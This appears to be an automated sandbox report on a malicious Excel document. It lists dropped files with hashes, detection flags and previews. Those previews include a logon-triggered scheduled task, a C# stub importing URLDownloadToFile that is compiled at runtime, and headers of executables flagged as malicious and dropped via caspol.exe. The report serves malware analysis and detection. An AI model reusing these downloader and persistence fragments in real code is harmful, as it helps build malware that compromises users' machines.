                                                                    SHA-512:402736C9A8FDA2732FD8004F9BCEE8543A6F2A5513D263271DE399B05C7B08AAEE914DD964F4FE58D7D4DACBE50BC8281224DDF9A95421C6E256E87335CCF75E
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):652
                                                                    Entropy (8bit):3.1160323863458923
                                                                    Encrypted:false
                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6lgak7YnqqplFPN5Dlq5J:+RI+ycuZhNQlgakSplFPNnqX
                                                                    MD5:E2824A2693B2A9D60BD6B710CB92E257
                                                                    SHA1:969F9E75166A86CE3283387842A329DF8FB02626
                                                                    SHA-256:1C0594035E7064754C53714AA55B4826AE2B72C013B3B419D3CFD620A30A73F0
                                                                    SHA-512:EB636DFE9D3429CA01D3A96E1B08F001A189ADCBC0663EF63C8FBCCE201112FDE9C9205573642BF89DB9265BA5641165A27F7148BF556462B14171282157A3D3
                                                                    Malicious:false
                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.p.w.v.v.p.v.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.p.w.v.v.p.v.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
                                                                    Category:dropped
                                                                    Size (bytes):484
                                                                    Entropy (8bit):3.8560947564999073
                                                                    Encrypted:false
                                                                    SSDEEP:6:V/DsYLDS81zu9l3NPMGHvQXReKJ8SRHy4HXQrBSOscVdmevvIy:V/DTLDfuhAXfHDQjmeYy
                                                                    MD5:FE82050659A8B97690D60529499222C1
                                                                    SHA1:7CC50135852B46DD1E36F2FF98506613DB525A68
                                                                    SHA-256:64C38563C4588B718B03AEC685677F173456D3C961EF97CD95E7784EE1E51A6A
                                                                    SHA-512:59356FD5CBB38A06BF09E182B8ED7C7C2200E6F8DE8E950BE38BEE0C45AA96B2DBF202BDC56097A74ACC4E0A8BC601558E83C098A376630CFA1BCCE64133D64F
                                                                    Malicious:false
                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace WPfW.{. public class dXGM. {. [DllImport("urlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr ZPntVsRhAh,string MyjpqIkQwDb,string ujQQpSXoIWy,uint M,IntPtr aYypvlykpe);.. }..}.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):369
                                                                    Entropy (8bit):5.247058552851948
                                                                    Encrypted:false
                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fyZP2Pqzxs7+AEszIP23fyZP2PPn:p37Lvkmb6Kz6ZP2PqWZEo6ZP2PP
                                                                    MD5:C2D6D171E646ACD5A992C45CEF48B28E
                                                                    SHA1:EB2AF197C24C18DF179CDE70CEA44F232B0A7313
                                                                    SHA-256:BA3B9F484180F97E57092756CA1968FCAEE6D6022B8857F20B57A2F2618086F3
                                                                    SHA-512:5B834AD948C0FAC3EAD0188FD4A4520D2721ACBF5904DAC7976B9146BB0816493BC4787F2EECB918167087888EA36EFC65BFABEEB913E990914F9CADCE7979E6
                                                                    Malicious:false
                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.0.cs"
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):3072
                                                                    Entropy (8bit):2.8621138631184917
                                                                    Encrypted:false
                                                                    SSDEEP:24:etGSXcPBG5eAdF8qdd/ka5AY+oTqtkZfL3oMEWI+ycuZhNQlgakSplFPNnq:6TsAdeqZ+uJL3oMn1ulwga3Lfq
                                                                    MD5:739890FBE3C8BE5AACE76078055D80E4
                                                                    SHA1:51D0DEC47702F448F6D54A86ECDC22CA6EAFDC0E
                                                                    SHA-256:89A732AFF0C278C8282F3DC812361150A3F671396FCCD445AF84CAC43254011F
                                                                    SHA-512:AA63BCB4F298306C106676B9341246967615BDE4D2D3C21F7C2CC6D8E8581E7F3D50C2AA2B2965A857EF5B9F6DE365E7DAB130A8CC88DCDDD656373775E2264E
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.=g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1.*...................................................... 8.....P ......J.........P.....[.....g.....s.....u...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.zp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                    Category:modified
                                                                    Size (bytes):866
                                                                    Entropy (8bit):5.338810386197388
                                                                    Encrypted:false
                                                                    SSDEEP:24:AId3ka6KzYOjEoYO+KaMD5DqBVKVrdFAMBJTH:Akka60DEoeKdDcVKdBJj
                                                                    MD5:F35DA853E4E2F5E829BD10D02BA863CB
                                                                    SHA1:AAB0DCEE08F75D48130B89B84D7D19B5A0C38EC2
                                                                    SHA-256:D594FE1DEFFD9FB1135D05C8B21B53C2CE313AF6FB583823838BEE5EB869E825
                                                                    SHA-512:FBE689246642694DD34C31E24D0B42493119D05FCD3B1F38985E6AAEB6836ABE0012AC7C5B19E02D18E4F9DF25A646E80ED07554D56986F21045775EABC3C53F
                                                                    Malicious:false
                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                    Category:dropped
                                                                    Size (bytes):676352
                                                                    Entropy (8bit):7.983724221826814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:yI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9Jwjm:DLnCRwSNjBKNA/XTDqHLPkj
                                                                    MD5:BE8B2204BF4B1C13E57632D3B2509012
                                                                    SHA1:3D83C474D340C0CA3CE845E5B289BCFCEF7CF57B
                                                                    SHA-256:AF2D0D0D2277ADA25E12029775E265428CDBCB9CD0FBBAC50BE00E3265BDD771
                                                                    SHA-512:6FC0E0DD86E5EE542E9BCF3ADB6346BB42C29429E912D8C151B20D4E4097B28F98CD2D380AA2A01CA5CC7C815567C31F2712021EDDE0BF69D2F45CF86DBCC28D
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):512
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3::
                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                    Malicious:false
                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):684032
                                                                    Entropy (8bit):7.939241252996024
                                                                    Encrypted:false
                                                                    SSDEEP:12288:SI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9Jwjm:jLnCRwSNjBKNA/XTDqHLPkj
                                                                    MD5:74F3FB367063DF4F13B131A8E1B608AC
                                                                    SHA1:99F202D01073BFB75EBB0DD4595A84093D99CE55
                                                                    SHA-256:D3377C7947A065C85F0FF8CC0BE16759776FB9AF6BED981B5691602A48CED628
                                                                    SHA-512:EEDDA2504A6C6692228668A13586743464247C35348E92EA18297F496FDEC80EAD0174031BB8721A5F9628CDAE9ABECA9F94A0A3FB5CDEB9EB6C2CF15337A3F4
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):10240
                                                                    Entropy (8bit):0.6739662216458647
                                                                    Encrypted:false
                                                                    SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                    MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                    SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                    SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                    SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                    Malicious:false
                                                                    Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):24152
                                                                    Entropy (8bit):0.7513521539333206
                                                                    Encrypted:false
                                                                    SSDEEP:24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
                                                                    MD5:8A8D71BED4B5760F2F82C680C2C8CACC
                                                                    SHA1:FA589EA7BA858C514079289BCEA3625432110427
                                                                    SHA-256:78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
                                                                    SHA-512:8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
                                                                    Malicious:false
                                                                    Preview: ...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):46
                                                                    Entropy (8bit):1.0424600748477153
                                                                    Encrypted:false
                                                                    SSDEEP:3:/lbWwWl:sZ
                                                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                                    Malicious:false
                                                                    Preview:........................................user.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
                                                                    Category:dropped
                                                                    Size (bytes):935936
                                                                    Entropy (8bit):7.986092737447108
                                                                    Encrypted:false
                                                                    SSDEEP:12288:vCtI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9JwjmeOsjF+8+SaxMDa:TLnCRwSNjBKNA/XTDqHLPkjeoOTxKVc
                                                                    MD5:FE52E1B2FAD0A9DBC313BFCEF716BB24
                                                                    SHA1:588DDDB8316556F896831E956356EE9C42839318
                                                                    SHA-256:81879191E77853BB80A206C89FD2E4342FCD80C10FDEE0B0FCE3D4AA7DE20791
                                                                    SHA-512:A3412C3E99F5D97DBF2DA9CF25F2FB73B1B682763452C105919ED91C1E807E179B3B627F0B58145EE43FCDB48F6F3485493E36059BA4F50BADCB62A7E48265DE
                                                                    Malicious:false
                                                                    Preview:......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0
